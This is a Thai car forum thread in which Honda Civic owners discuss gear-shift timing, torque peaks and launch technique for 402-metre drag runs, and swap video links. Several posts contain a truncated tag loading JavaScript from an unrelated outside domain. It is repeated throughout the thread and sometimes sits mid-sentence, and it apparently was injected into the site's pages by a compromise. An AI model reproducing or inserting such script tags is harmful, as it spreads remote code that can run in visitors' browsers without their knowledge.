ตอบ
aoftion


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 09 กรกฎา 2011
ตอบ: 240

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 81
ให้คำขอบคุณ: 1

ที่อยู่: นนทร์ บางใหญ่
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 20 พฤศจิกา 2011 23:33 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ต้องไปลอง คับ
ได้รับคำขอบคุณจาก: puyzaaaaa 
hanaun


เข้าร่วม: 16 ตุลา 2008
ตอบ: 1102

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 863
ให้คำขอบคุณ: 192

ที่อยู่: นครสวรรค์ พิจิตร พิษณุโลก
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 20 พฤศจิกา 2011 23:38 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ไหนว่าอกหักไง??
ได้รับคำขอบคุณจาก: puyzaaaaa 
bigforplay


ชื่อเล่น: บิ๊ก

เข้าร่วม: 16 เมษา 2011
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1467
ให้คำขอบคุณ: 29

ที่อยู่: ทุ่งครุ/ประชาอุทิศ/สุขสวัสดิ์
ปี: 2005
อาทิตย์, 20 พฤศจิกา 2011 23:55 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
มาเกบข้อมูลไปซิ่ง <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 21 พฤศจิกา 2011 00:21 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ham_ter พิมพ์ว่า:
hacker พิมพ์ว่า:
ไม่เคยเห็นคนออกเกียร์ 2 ซักที สูตรไหนเนี้ย

ออกสองแล้วมันจะวิ่งเหรอ ....

สับให้ทันครับ เรดไลน์ทุกรอบ อย่าให้ถึงรอบตัดนะ ไม่งั้นจะเสียเวลาไปอีก

สูตรขี้เกียจสับเกียร์สำหรับมือใหม่ค่า
ถ้าออกสองเลยก็ไม่ต้องเสียเวลากับรอบตัดละ วืดไงคะ
ส่วนออกได้ไหมก็ได้แน่นอนจ้า ลองออกไฟแดงกะพวกอ๊อดดูก็ได้
เพราะบางคนถ้ามือใหม่ จะชอบวืดสองจริงไหมล่ะ อิอิ

ถ้ายังงี้เวลา 402 เมตรคงจะเพิ่มอ่ะนะถ้าออกเกียร์ 2 อ่ะ
ได้รับคำขอบคุณจาก: puyzaaaaa  Bonuses01 
tangle free


ชื่อเล่น: โต้ง

เข้าร่วม: 05 ตุลา 2008
ตอบ: 238

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 91

ที่อยู่: มธ. รังสิต/บางนา
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 21 พฤศจิกา 2011 00:51 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน
ได้รับคำขอบคุณจาก: mark_es03  puyzaaaaa  hacker  Bonuses01  wut-chiangmai  Phetcharat  numxs  yoosabai  kismcomed 
eschocolate


ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

ที่อยู่: ระยอง - บางแสน Es chonburi Mahanakorn
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 21 พฤศจิกา 2011 01:19 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
hacker พิมพ์ว่า:
ไม่เคยเห็นคนออกเกียร์ 2 ซักที สูตรไหนเนี้ย

ออกสองแล้วมันจะวิ่งเหรอ ....

สับให้ทันครับ เรดไลน์ทุกรอบ อย่าให้ถึงรอบตัดนะ ไม่งั้นจะเสียเวลาไปอีก


ไม่เคยเห็นเหมือนกัน ถ้าออกเกียร์2 รถคงพัง
ได้รับคำขอบคุณจาก: puyzaaaaa 
eschocolate


ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

ที่อยู่: ระยอง - บางแสน Es chonburi Mahanakorn
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 21 พฤศจิกา 2011 01:23 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน


เห็นด้วย ตามนั้นเลยคับ
ได้รับคำขอบคุณจาก: puyzaaaaa 
eschocolate


ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

ที่อยู่: ระยอง - บางแสน Es chonburi Mahanakorn
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 21 พฤศจิกา 2011 01:24 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน


เห็นด้วย ตามนั้นเลยคับ
ได้รับคำขอบคุณจาก: puyzaaaaa 
GuideZ


เข้าร่วม: 01 ตุลา 2008
ตอบ: 837

Guru ES
Guru ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 136

ที่อยู่: THE GANG ไก่จ๊าก ระยองฮิ
จันทร์, 21 พฤศจิกา 2011 05:14 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ได้รับคำขอบคุณจาก: puyzaaaaa 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 21 พฤศจิกา 2011 05:39 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
hanaun พิมพ์ว่า:
ไหนว่าอกหักไง??



อกหัก อะเรื่อง จริง !! มันเกียวอ่าร่ายกับ การใส่เกียร์ป่าว พี่....

....
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 21 พฤศจิกา 2011 08:56 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ขอบคุณทุกคำตอบครับครับ ....

ต้องขอย้ำ ตรงนี้ว่า การที่ผมมาถามนี้เพื่อประดับความรู้และแลกเปลี่ยน เทคนิคต่างๆกับพี่ทุกคน..

โดยไม่มีจุดประสงค์ที่จะก่อความวุ่นวายบนท้องถนน หรือ สร้างความเดือดร้อนให้กับผู้อื่นครับ ^^>

ได้รับคำขอบคุณจาก: mark_es03 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 21 พฤศจิกา 2011 08:59 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน


นี้แหละครับพี่ที่อยากทำความเข้าใจ...

ขอบคุณสำหรับ ข้อมูลดีๆนะครับ ^^
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 21 พฤศจิกา 2011 09:00 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
เอาคลิปวิดีโอ มายืนยันหน่อยสิ มันออกยังไง ภาคทฤษฏีไม่ค่อยเข้าใจ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 21 พฤศจิกา 2011 11:25 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
สับให้ไว และอย่าให้รอบตัดครับ
ได้รับคำขอบคุณจาก: puyzaaaaa 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 21 พฤศจิกา 2011 15:25 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
สับให้ไวครับ..
ได้รับคำขอบคุณจาก: puyzaaaaa 
jo_jonatan


ชื่อเล่น: โจ้

เข้าร่วม: 05 ตุลา 2009
ตอบ: 629

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 572
ให้คำขอบคุณ: 536

ที่อยู่: ลาดกระบัง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 21 พฤศจิกา 2011 15:28 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน


ได้รับคำขอบคุณจาก: puyzaaaaa 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 21 พฤศจิกา 2011 18:26 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
underhill พิมพ์ว่า:
เอาคลิปวิดีโอ มายืนยันหน่อยสิ มันออกยังไง ภาคทฤษฏีไม่ค่อยเข้าใจ <script src="https://sport32news.com/civicesgroup.js"></

ปกติใช้แต่ EK ก็เลยมีแต่ของ EK
อันนี้คลิปรถพวกรุ่นน้องในเชียงใหม่ที่เจอกันบ่อยๆ
http://www.youtube.com/watch?v=MpsIC22-I0k
http://www.youtube.com/watch?v=GP8sAePmhRE
ได้รับคำขอบคุณจาก: underhill 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 21 พฤศจิกา 2011 18:29 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน

ส่วนตัวคิดว่า 1 ไปสองไม่ให้วืดนี่ยากมากตอนที่ออกตัวอ่ะ ต้องลองฝึกสับเกียร์ให้มากๆ ก่อน แล้วค่อยจับจังหวะรอบดีกว่า เพราะตอน หกเจ็ดพัน วืด แก๊งที นี่ หุหุ เวลา วิ่งไปเยอะเลยนะ หุหุ


แก้ไขล่าสุดโดย เมื่อ จันทร์, 21 พฤศจิกา 2011 18:33, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 21 พฤศจิกา 2011 18:31 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ham_ter พิมพ์ว่า:
underhill พิมพ์ว่า:
เอาคลิปวิดีโอ มายืนยันหน่อยสิ มันออกยังไง ภาคทฤษฏีไม่ค่อยเข้าใจ <script src="https://sport32news.com/civicesgroup.js"></

ปกติใช้แต่ EK ก็เลยมีแต่ของ EK
อันนี้คลิปรถพวกรุ่นน้องในเชียงใหม่ที่เจอกันบ่อยๆ
http://www.youtube.com/watch?v=MpsIC22-I0k
http://www.youtube.com/watch?v=GP8sAePmhRE


โฮ่ๆ สุดยอดไปเลย ว่าแต่มีตังเติมน้ำมันกันเยอะจิงนะ <script src="https://sport32news.com/civicesgroup.js"></

ส่วนตัวเราขอกลับไปขับกินลม ชมวิวแบบเดิมๆดีกว่า
ได้รับคำขอบคุณจาก: puyzaaaaa 
numxs


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 ตุลา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1427
ให้คำขอบคุณ: 1715

ที่อยู่: สระบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 21 พฤศจิกา 2011 21:03 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
tangle free พิมพ์ว่า:
numxs พิมพ์ว่า:
ออกตัวเกียร์ 1
ต้องดูที่ แรงบิด สูงสุด ว่า ที่กี่พันรอบ/นาทีครับ
สมมุติว่า แรงบิด 16Nm@5900 Rpm เราลากเกียร์ไป เกิน 5900 ก็ไม่มีประโยชน์ เพราะแรงบิดมันตัน ตั้งแต่ 5900 แล้ว
สับเกียร์ ที่ 5900 จะทำให้รถเรา วิ่งได้ดีที่สุด ถ้าให้ดี ติดวัดรอบ แล้วต่อ ShiftLight ตั้งไว้ 5900 พอไฟติดก็สับเกียร์
ข้อมูลผิดพลาดยังไง ขออภัยครับ


ขอแก้ไขนิดนึงนะครับ ไม่ใช่ว่าถึงแรงบิดสูงสุดแล้วสับนะครับ แต่มันสำคัญที่เมื่อสับเกียร์แล้วรอบต้องตกลงมาอยู่ในช่วงที่เเรงบิดสูงสุดครับ มิฉะนั้นพอสับแล้วรถจะเหี่ยวครับ ส่วนเรื่องวิธีการขับ 0-402 นี่ต้องลองเยอะๆ หลายๆแบบ แล้วดูว่าเวลาแบบไหนดีสุด เช่น รอบที่จะใช้ออก จังหวะหนึ่งไปสอง(มันจะยากตรงที่มันต้องดูจังหวะล้อที่ฟรีทิ้งอยู่ด้วย) และอื่นๆอีกมากมายครับ มันมีหลายปัจจัยจริงๆ ถ้าข้อมูลนี้ผิดพลาดยังไงแก้ไขโต้แย้งได้นะครับ จะได้ได้ความเข้าใจที่ถูกต้องกันทุกๆคน



ขอบคุณ สำหรับ อีกความรู้ใหม่ๆครับ ไม่มีอะไรโต้แย้ง
ohmz1541


ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ที่อยู่: เชียงราย-รามอินทรา
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 21 พฤศจิกา 2011 21:26 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ham_ter พิมพ์ว่า:
underhill พิมพ์ว่า:
เอาคลิปวิดีโอ มายืนยันหน่อยสิ มันออกยังไง ภาคทฤษฏีไม่ค่อยเข้าใจ <script src="https://sport32news.com/civicesgroup.js"></

ปกติใช้แต่ EK ก็เลยมีแต่ของ EK
อันนี้คลิปรถพวกรุ่นน้องในเชียงใหม่ที่เจอกันบ่อยๆ
http://www.youtube.com/watch?v=MpsIC22-I0k
http://www.youtube.com/watch?v=GP8sAePmhRE



สองคลิบนี้ ฉากต่อไปคือน้ำมันหมด 555 เล่นซะเหลือน้ำมันเกลี้ยงถังขนาดนั้น <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
อังคาร, 22 พฤศจิกา 2011 23:29 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ohmz1541 พิมพ์ว่า:
ham_ter พิมพ์ว่า:
underhill พิมพ์ว่า:
เอาคลิปวิดีโอ มายืนยันหน่อยสิ มันออกยังไง ภาคทฤษฏีไม่ค่อยเข้าใจ <script src="https://sport32news.com/civicesgroup.js"></

ปกติใช้แต่ EK ก็เลยมีแต่ของ EK
อันนี้คลิปรถพวกรุ่นน้องในเชียงใหม่ที่เจอกันบ่อยๆ
http://www.youtube.com/watch?v=MpsIC22-I0k
http://www.youtube.com/watch?v=GP8sAePmhRE



สองคลิบนี้ ฉากต่อไปคือน้ำมันหมด 555 เล่นซะเหลือน้ำมันเกลี้ยงถังขนาดนั้น <script src="https://sport32news.com/civicesgroup.js"></


น่าจะเป็นอย่างงันครับ

ปล. วันนี้น้ำมันหมดทลึงไปเติม แก๊ส 91 กระตุก งึกๆๆๆ งักๆๆๆ อด ทดสอบเลย T_T

.... ปกติเติมเบนซิน 91 น้ำมันลด แต่ช่วงนี้อกหัก เลยประหยัดตังทุกบาทเข้ากองทุนหม้อใบใหม่
ekdanai


ชื่อเล่น: ช้าง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 2062

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1977
ให้คำขอบคุณ: 1004

ที่อยู่: อ.เมือง จ.พิษณุโลก
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
อังคาร, 22 พฤศจิกา 2011 23:42 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
ถนน กับ สนามแข่ง ไม่เหมือนกันน้อง หาประสบการณ์เอาเองทำอย่างไรให้แรงม้ามันลงพื้นให้หมด เครื่องยนต์ ยาง ช่วงล่าง คนขับ แถลก ใน สนาม ถ้วย เงิน ชื่อเสียง ส่วนถนน
ได้รับคำขอบคุณจาก: puyzaaaaa 
nawintar


ชื่อเล่น: ต้าร์

เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 1383

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 64

ที่อยู่: แก่งคอย หนองแค สระบุรี
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 23 พฤศจิกา 2011 11:40 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
mark_es03 พิมพ์ว่า:
ตัดเปนสับ ตัดสับๆ



วันนั้นก้อออกหั้ยดูแล้วงัย
ได้รับคำขอบคุณจาก: puyzaaaaa 
mark_es03


ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

ที่อยู่: สิบทิศเซอร์วิส
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 23 พฤศจิกา 2011 12:26 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
nawintar พิมพ์ว่า:
mark_es03 พิมพ์ว่า:
ตัดเปนสับ ตัดสับๆ



วันนั้นก้อออกหั้ยดูแล้วงัย


วันพระไม่มีหนเดียว <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พุธ, 23 พฤศจิกา 2011 18:59 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
งงมากมายเลยครับ แปลก จริง เติม แก๊ส 91 400 บาท ราคา แก๊สราคาลิตรละ 31-32 บาท

ขับได้ 110 กิโล T_T

...... ปกติเติม เบนซิน ไม่หมดเร็วขนาดนี้เลย...

ปล.อุสาจะเก็บเงินเข้ากองทุน ตีหม้อ T_T
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
